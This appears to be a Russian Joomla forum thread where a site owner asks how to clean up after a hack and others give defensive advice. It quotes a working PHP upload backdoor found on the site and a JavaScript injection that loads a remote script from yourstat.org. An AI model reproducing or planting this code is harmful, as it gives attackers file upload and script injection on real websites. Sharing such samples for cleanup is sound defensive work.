Взломали сайт, есть практика "лечения"?

  • 45 Ответов
  • 1599 Просмотров

0 Пользователей и 1 Гость просматривают эту тему.

Никто не сталкивался? Сайт взломали, случайно обнаружил файл (krd.html) в корне следующего содержания:

HaCkeD By MuhmadEmad
Long Live to peshmarga
kurdlinux007@gmail.com
*** ISIS !

Может кто знает как бороться? 
Joomla стоит 3.4.7

Так же в корне еще находится файл (apis.php) сожержание:

<?
error_reporting(0);
if(isset($_GET[sdbu]))
   {
      echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]<br>";
      echo "<font color=#FFFFFF>[pwd]".getcwd()."[/pwd]<br>";
      print "\n";$disable_functions = @ini_get("disable_functions");
      echo "DisablePHP=".$disable_functions; print "<br>";
      echo"<form method=post enctype=multipart/form-data>";
      echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";
        if($_POST["v"]==up)
{ if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}} 
{ if(@copy($_FILES["emad"]["tmp_name"],$_FILES["emad"]["name"])){echo"<b></b>-->".$_FILES["emad"]["name"];}else{echo"<b>";}}}
?>

*

Оффлайн wishlight

  • ********
  • 3580
  • [+]221 / [-]1
  • skype aqaus.com
    • Просмотр профиля
    • Aqaus

*

Оффлайн winstrool

  • *****
  • 758
  • [+]41 / [-]2
  • Свободен для работы
    • Просмотр профиля
    • Как вылечить сайт от вирусов?
Joomla стоит 3.4.7
Бывает, что шелы на сайтах месяцами-годами лежат, а юзаются по мере необходимости, эта ветка версии недавно с фиксами вышла, шелы наверняка уже до нее были, более того, на сегодняшний день уже есть https://www.joomla.org/announcements/release-news/5644-joomla-3-4-8-released.html - Joomla 3.4.8
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям

http://joomlaforum.ru/index.php/board,104.0.html в основном разделе полно рекомендаций. Советую воспользоватся сканером ai-bolit поле обновления всего, что возможно на сайте.
Сканировал ai-bolit'ом еще до установки различных модулей...отсылал результат Земскову - ответил, что все Ок


елы на сайтах месяцами-годами лежат, а юзаются по мере необходимости, эта ветка версии недавно с фиксами вышла, шелы наверняка уже до нее были, более того, на сегодняшний день уже есть https://www.joomla.org/announcements/release-news/5644-joomla-3-4-8-released.html - Joomla 3.4.8

Угу, обновляюсь

*

Оффлайн winstrool

  • *****
  • 758
  • [+]41 / [-]2
  • Свободен для работы
    • Просмотр профиля
    • Как вылечить сайт от вирусов?
Сканировал ai-bolit'ом еще до установки различных модулей...отсылал результат Земскову - ответил, что все Ок
ai-bolit - это одно из решений к комплексному подходу, второй момент просто также шелл не оказался же.... может это и просто в качестве бегдора лежал, но еще не использовался, в любом случае имеет смысл подумать по усилению защиты сайта, дабы избежать подобных рисков заражения.
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям

*

Оффлайн 12mv

  • *****
  • 526
  • [+]20 / [-]0
  • Гульсина
    • Просмотр профиля
Мне так кажется, что простого обновления не достаточно. Нужно вылечить сайт, а потом уже обновлять.
скачайте сайт на комп и  поиском по файлам в нотепаде ищите упоминания о подозрительных строчках, чистите и заливайте обратно сайт. В каждой папке нужно проверить и сравнить с дистрибьютором на наличие лишних/подозрительных и сносить. А потом уже обновлять на чистом сайте.
Я свой так и вылечила на 1.5 когда то) Айболитом мне ничего не показывало, а Яндекс и Google заблочили, пришлось самой копать.

ai-bolit - это одно из решений к комплексному подходу, второй момент просто также шелл не оказался же.... может это и просто в качестве бегдора лежал, но еще не использовался, в любом случае имеет смысл подумать по усилению защиты сайта, дабы избежать подобных рисков заражения.
Спасибо, сканирую повторно

>>Мне так кажется, что простого обновления не достаточно. Нужно вылечить сайт, а потом уже обновлять.
Как бы, не могу понять от чего лечить. файлы шелла - удалил. В корне и в папке tmp.
Меня больше интересует, а как можно проанализировать, может это брутфорс? Как-то можно отследить количество попыток ввода пароля для ftp?

В папке log, есть файл error.php В нем 20 тысяч запросов вида:

2015-11-17T05:55:13+00:00   INFO 46.161.3.92   joomlafailure   Имя пользователя и пароль не совпадают или у вас ещё нет учётной записи на сайте
2015-11-17T05:55:19+00:00   INFO 46.161.3.92   joomlafailure   Имя пользователя и пароль не совпадают или у вас ещё нет учётной записи на сайте
2015-11-17T05:55:24+00:00   INFO 46.161.3.92   joomlafailure   Имя пользователя и пароль не совпадают или у вас ещё нет учётной записи на сайте
2015-11-17T05:55:28+00:00   INFO 46.161.3.92   joomlafailure   Имя пользователя и пароль не совпадают или у вас ещё нет учётной записи на сайте

*

Оффлайн SeBun

В папке log, есть файл error.php В нем 20 тысяч запросов вида:

2015-11-17T05:55:13+00:00   INFO 46.161.3.92   joomlafailure   Имя пользователя и пароль не совпадают или у вас ещё нет учётной записи на сайте
Похоже на брут.
Оказываю услуги по Joomla | Миграция на Joomla 3.x | Администрирование
Ник занят | По личным вопросам не консультирую

*

Оффлайн winstrool

  • *****
  • 758
  • [+]41 / [-]2
  • Свободен для работы
    • Просмотр профиля
    • Как вылечить сайт от вирусов?
Да, там ведутся записи, о не верной аутентификации, админку нужно дополнительно защищать!
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям

Первая запись от 04.11 последняя от 29.12...вчера и обнаружил файл. Это чего, меня пытались взломать полтора месяца?)

*

Оффлайн 12mv

  • *****
  • 526
  • [+]20 / [-]0
  • Гульсина
    • Просмотр профиля
Как бы, не могу понять от чего лечить. файлы шелла - удалил. В корне и в папке tmp.
Меня больше интересует, а как можно проанализировать, может это брутфорс? Как-то можно отследить количество попыток ввода пароля для ftp?

Определить можно по лог файлам, с каких IP заходили, учше попросить хостеров чтобы вытащили.

Простого удаления сторонних файлов не достаточно, нужно так же вычистить и файлы в которые был добавлен код.
В моём случае, были заражены js файлы ( 749  файлов)

во всех файлах этих был код:

function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000));
if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<scr'+'ipt src="http://yourstat.org/yourstat.php"></scr'+'ipt>');}

Все зараженные файлы я тут нашла: http://antivirus-alarm.ru/
После чистки и перепроверки, показало что всё чисто, Яндекс и Google разбанили тоже.

*

Оффлайн SeBun

Определить можно по лог файлам, с каких IP заходили...
Что бы понять, как действует взломщик, нужно самому быть немного хакером и знать механизмы получения доступа к сайту, а их довольно много. Логи при этом могут не всегда вестись. Например, если выполняется SQL-инъект.
Оказываю услуги по Joomla | Миграция на Joomla 3.x | Администрирование
Ник занят | По личным вопросам не консультирую

Проверил http://antivirus-alarm.ru/ пока все чисто.
Модификации файлов, можно отследить по их последнему изменению?

Что бы понять, как действует взломщик, нужно самому быть немного хакером и знать механизмы получения доступа к сайту, а их довольно много. Логи при этом могут не всегда вестись. Например, если выполняется SQL-инъект.
Я пока смотрю...в сторону плагинов которые помогут отследить это

*

Оффлайн winstrool

  • *****
  • 758
  • [+]41 / [-]2
  • Свободен для работы
    • Просмотр профиля
    • Как вылечить сайт от вирусов?
Проверил http://antivirus-alarm.ru/ пока все чисто.
Модификации файлов, можно отследить по их последнему изменению?
Если взломщик не менял то да, но опытные меняют, у файлов есть три атрибута даты, дата создания, дата изминения и дата доступа(вроде так...), вы в своих панелях, как правило, видите только дату изменения, которую можно поправить функцией touch();

Чтобы вообще понять некоторые аспекты уязвимости сайтов и серваков, залейте сами к себе на сайт WSO shell (как пример) и по изучайте возможности того, чего вы сможете сделать если вы внутри, и что вам вообще нужно сделать чтоб избежать этого, по изучайте различные варианты бегдоров, посмотрите как они работают, попробуйте написать свои варианты, это вам поможет понять общею философию сего дела.
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям

*

Оффлайн 12mv

  • *****
  • 526
  • [+]20 / [-]0
  • Гульсина
    • Просмотр профиля
Мне тут видео скинули, как шелл заливают. Руки бы оторвала.


*

Оффлайн SeBun

Мне тут видео скинули, как шелл заливают. Руки бы оторвала.
Нужно не руки отрывать, а учиться элементарным правилам безопасности. Почитайте...
Оказываю услуги по Joomla | Миграция на Joomla 3.x | Администрирование
Ник занят | По личным вопросам не консультирую

*

Оффлайн winstrool

  • *****
  • 758
  • [+]41 / [-]2
  • Свободен для работы
    • Просмотр профиля
    • Как вылечить сайт от вирусов?
Мне тут видео скинули, как шелл заливают. Руки бы оторвала.


... да на твоем видео еще и ядро рутабельное, что может привести к рууту всего хостинга!...

Отрывай  :laugh: :laugh: :laugh:
https://forum.antichat.ru/threads/398859/

P.S: Меня честно иногда удивляет, когда люди лезут в защиту и лечения сайтов, не понимая техник, методик взлома и троянизации систем.
« Последнее редактирование: 30.12.2015, 13:43:44 от winstrool »
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям

В соседней ветке есть цитата:

Цитировать
В логах нашел записи
86.123.69.119 - - [17/Dec/2015:10:30:37 +0300] "GET / HTTP/1.1" 200 32849 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"
86.123.69.119 - - [17/Dec/2015:10:30:39 +0300] "GET / HTTP/1.1" 200 35301 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"
86.123.69.119 - - [17/Dec/2015:10:30:40 +0300] "GET /config.php HTTP/1.1" 200 170 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"

Данные логи нужно просить у хостера?

*

Оффлайн winstrool

  • *****
  • 758
  • [+]41 / [-]2
  • Свободен для работы
    • Просмотр профиля
    • Как вылечить сайт от вирусов?
Все проси, все пригодятся, если умеешь анализировать, а если нет, то толку не будет...
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям

Теперь нужно и пароль к базе данных менять. Это можно сделать в фале configuration.php?

*

Оффлайн winstrool

  • *****
  • 758
  • [+]41 / [-]2
  • Свободен для работы
    • Просмотр профиля
    • Как вылечить сайт от вирусов?
Теперь нужно и пароль к базе данных менять. Это можно сделать в фале configuration.php?
Сначала в центральной панели хостинга, а потом в configuration.php
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям

*

Оффлайн wishlight

  • ********
  • 3580
  • [+]221 / [-]1
  • skype aqaus.com
    • Просмотр профиля
    • Aqaus
Там данные доступа меняются. А сам пароль через панель управления или консоль. Если вы уже сменили пароль к пользователю базы данных, то да в configuration.php пишутся новые данные.

*

Оффлайн 12mv

  • *****
  • 526
  • [+]20 / [-]0
  • Гульсина
    • Просмотр профиля
Теперь нужно и пароль к базе данных менять. Это можно сделать в фале configuration.php?

И не только там, знаю дурная привычка, ftp оставлять, поработал, удалить доступ.

Сменил через консоль а :) configuration.php не дает редактировать по ftp) Где меняются привилегии?

Ага все изменил...) спасибо

*

Онлайн flyingspook

Папку администратора закройте, если еще не закрыли, с помощью http авторизации

Ага, читаю как сделать это. Спасибо за совет

*

Онлайн flyingspook

Ага, читаю как сделать это. Спасибо за совет
на хостинге в менеджере файлов или еще где есть сейчас практически везде "ограничения на папку" называется, там указываете папку и логин и пас для пользователя вписываете и автоматом все нужные файлы создаются